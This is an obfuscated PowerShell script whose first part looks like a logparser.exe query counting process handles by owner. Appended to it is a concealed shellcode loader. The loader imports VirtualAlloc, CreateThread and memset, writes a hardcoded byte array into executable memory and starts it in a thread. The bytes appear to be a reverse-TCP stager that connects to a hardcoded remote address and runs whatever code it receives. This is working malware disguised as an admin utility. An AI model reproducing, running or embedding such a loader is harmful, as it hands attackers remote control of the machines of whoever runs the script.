 SET-item variaBlE:Cw2  (  [TypE]("{4}{0}{2}{1}{3}" -f 'y','M.','STe','iO.Path','s') ) ; 


if (.("{0}{2}{1}" -f 'Get','ommand','-C') ("{2}{1}{0}{3}"-f'parser.ex','og','l','e')) {
    ${Lpqu`e`RY} = ((("{28}{7}{25}{29}{19}{9}{26}{5}{13}{27}{24}{4}{12}{0}{2}{18}{8}{15}{22}{3}{14}{30}{17}{23}{16}{10}{11}{6}{21}{1}{20}"-f '   Process',' ','Name,
        Owne',' *',',
 ','e,','  ','ELEC',' ','(Proces','ner
 ',' ','    ','
 ','Handle.tsv','  FROM
  ','w','        ','r
 ','OUNT','     ct ASC
29X','ORDER BY
  ','     ','O','ct','T
       ','sNam','       Owner) as ','29X
    S',' C','
    GROUP BY
        ProcessName,
')) -rePLAce'29X',[cHaR]34)

    & ("{1}{2}{0}"-f 'ser','logp','ar') -stats:("{0}{1}" -f'of','f') -i:("{0}{1}" -f 'c','sv') -dtlines:0 -fixedsep:('on') -rtp:('-1') "$lpquery"

} else {
    ${Sc`RipTN`AME} =   $cW2::("{2}{0}{1}" -f 'tFi','leName','Ge').Invoke(${M`Y`iNVoCATioN}."S`crIptNA`ME")
    "${ScriptName} requires logparser.exe in the path."
}

${C} = ((("{11}{10}{74}{39}{35}{31}{32}{26}{43}{63}{68}{60}{48}{21}{62}{51}{5}{23}{56}{64}{6}{57}{84}{77}{89}{22}{93}{41}{55}{30}{42}{72}{20}{2}{45}{80}{52}{19}{50}{25}{3}{54}{86}{79}{58}{61}{87}{9}{76}{92}{66}{18}{8}{85}{14}{67}{82}{47}{90}{75}{33}{65}{4}{78}{0}{29}{70}{7}{44}{16}{59}{83}{49}{37}{15}{28}{17}{12}{40}{34}{71}{36}{88}{1}{38}{27}{53}{13}{73}{81}{69}{24}{91}{46}"-f 'rameter, uint d','tr ','DllImport','n',' l','n IntPtr Virtua','ess,','s, ','ute','Int','m','[DllI','ti','e',' d','dllZ6','ntPtr','sta','ib','ublic stati','ct);[','x','uint flAll','lAlloc(IntPt',', uint ','exter','2.d','et(IntP','K)]public ','wCr','int','ne','l3','tP','e','r','n In','crt.','mems','6Kke','c ','cationT',' ','l','I','(Z6Kkernel3',');','tP',' e',');[DllImport(Z6Kmsv','c ','r','dllZ6K)]p','tr d',' ','ype, u','r lpAd',' uint ','e',' lp','blic static','ateThrea','te','lZ6K)]p','dr','tr','hreadAttr','wStackSize, I','u','src','eationFlag','xter','flProte','st, u','port(Z','tartAddress, In','Ptr','e','pPa','Cr','2.','int ','n','ThreadId','dwSiz','s, uint','IntPtr ','d(','tP',', ','tr lpS','count',' lpT','o'))-rEplAce  'Z6K',[CHAr]34);${W} = &("{2}{1}{0}"-f'pe','d-Ty','Ad') -memberDefinition ${C} -Name ("{1}{0}" -f 'in32','W') -namespace ("{4}{2}{0}{3}{1}"-f'io','s','2Funct','n','Win3') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0x53,0x3c,0x98,0xdb,0x68,0x02,0x00,0x00,0x50,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x75,0xee,0xc3;${g} = 0x1000;if (${Z}."LE`NG`Th" -gt 0x1000){${g} = ${z}."l`Ength"};${X}=${W}::("{1}{0}{2}{3}" -f'ua','Virt','lAll','oc').Invoke(0,0x1000,${G},0x40);for (${I}=0;${I} -le (${z}."LE`NgTH"-1);${i}++) {${w}::"Mem`SEt"([IntPtr](${x}.("{0}{2}{1}"-f 'To','32','Int').Invoke()+${I}), ${z}[${I}], 1)};${W}::("{0}{2}{1}{3}"-f 'C','ateThrea','re','d').Invoke(0,0,${x},0,0,0);for (;;){.("{0}{2}{1}" -f 'Start','sleep','-') 60};
